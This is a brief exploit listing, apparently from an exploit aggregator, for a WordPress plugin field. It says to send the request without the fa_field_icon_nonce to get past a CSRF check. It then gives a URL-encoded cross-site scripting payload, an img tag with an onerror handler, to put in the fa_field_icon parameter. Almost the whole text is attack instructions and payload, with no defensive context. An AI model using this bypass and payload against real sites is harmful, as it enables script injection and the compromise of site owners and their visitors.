Share 
## https://sploitus.com/exploit?id=WPEX-ID:9571540F-19ED-47CA-B9AE-20F2713F7FA4
Submit the request without the fa_field_icon_nonce to bypass the CSRF check

For XSS, fa_field_icon=%22%3e%3cimg%20src%20onerror%3dalert(%2fXSS%2f)%3e